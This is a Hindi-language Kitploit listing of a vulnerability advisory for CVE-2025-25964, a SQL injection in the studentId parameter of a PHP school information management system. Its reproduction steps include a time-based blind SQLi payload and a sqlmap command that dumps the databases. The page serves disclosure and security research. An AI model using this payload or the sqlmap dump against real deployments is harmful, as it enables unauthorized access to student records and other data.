Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-25964 — स्कूल सूचना प्रबंधन प्रणाली v1.0 में खोजी गई एक महत्वपूर्ण SQL इंजेक्शन भेद्यता (CVE-2025-25964) | Kitploit
उपकरण/GitHubGitHub/sudo-sakib/cve-2025-25964
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHubsudo-sakib/cve-2025-25964

CVE-2025-25964

स्कूल सूचना प्रबंधन प्रणाली v1.0 में खोजी गई एक महत्वपूर्ण SQL इंजेक्शन भेद्यता (CVE-2025-25964)

रिपॉजिटरी देखें
2241 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-25964: स्कूल सूचना प्रबंधन प्रणाली v1.0 में SQL इंजेक्शन

परिचय

आज के डिजिटल परिदृश्य में, SQL इंजेक्शन (SQLi) वेब अनुप्रयोगों में पाई जाने वाली सबसे सामान्य और खतरनाक असुरक्षाओं में से एक बनी हुई है। यह ब्लॉग पोस्ट Itsourcecode द्वारा विकसित स्कूल सूचना प्रबंधन प्रणाली v1.0 में खोजी गई एक महत्वपूर्ण SQL इंजेक्शन असुरक्षा (CVE-2025-25964) पर चर्चा करता है। यह असुरक्षा दूरस्थ हमलावरों को सिस्टम का शोषण करने की अनुमति देती है, जिससे संभावित संवेदनशील जानकारी का खुलासा हो सकता है।

असुरक्षा अवलोकन

CVE ID: CVE-2025-25964

असुरक्षा प्रकार: SQL Injection (SQLi)

प्रभावित उत्पाद: छात्र सूचना प्रबंधन प्रणाली - v1.0

प्रभावित घटक: /columbans/admin/modules/student/index.php में studentId पैरामीटर

हमले का प्रकार: दूरस्थ

गंभीरता: उच्च

खोजकर्ता: Sakib Shaikh

पुनरुत्पादन के चरण

प्रभाव प्रदर्शित करने के लिए, इन चरण-दर-चरण निर्देशों का पालन करें:

  1. असुरक्षित एप्लिकेशन सेट करें: स्कूल सूचना प्रबंधन प्रणाली v1.0 को स्थानीय सर्वर पर स्थापित और कॉन्फ़िगर करें।

  2. लॉग इन करें: Itsourcecode द्वारा प्रदान किए गए क्रेडेंशियल्स के साथ लॉग इन करें।

  3. असुरक्षित एंडपॉइंट तक पहुँचें:

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207

  1. SQL इंजेक्शन के लिए एक SQL पेलोड इंजेक्ट करें:

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))zKnT)

  1. एप्लिकेशन प्रतिक्रिया देखें: यदि पृष्ठ लोड होने में 10+ सेकंड लगते हैं, तो SQL इंजेक्शन असुरक्षा की पुष्टि हो जाती है। यह साबित करता है कि बैकएंड डेटाबेस इंजेक्ट किए गए SQL क्वेरी को निष्पादित कर रहा है।

  2. स्वचालित शोषण के लिए SQLMap का उपयोग करें:

root@kitploit:~
python sqlmap.py -u "http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207" \
--cookie="PHPSESSID=your_cookie_here" --risk 3 --level 3 --dbs --technique=T --dump --no-cast

मूल कारण विश्लेषण

यह समस्या index.php फ़ाइल के studentId पैरामीटर में अनुचित इनपुट स्वच्छता के कारण उत्पन्न होती है। जब कोई हमलावर studentId पैरामीटर को दुर्भावनापूर्ण SQL पेलोड के साथ संशोधित करता है, तो एप्लिकेशन बिना उचित सत्यापन के इनपुट को संसाधित करता है, जिससे SQL इंजेक्शन होता है।

संदर्भ

https://itsourcecode.com/free-projects/php-project/st-columban-student-information-management-system/

https://owasp.org/www-community/attacks/SQL_Injection

टूल डाउनलोड करें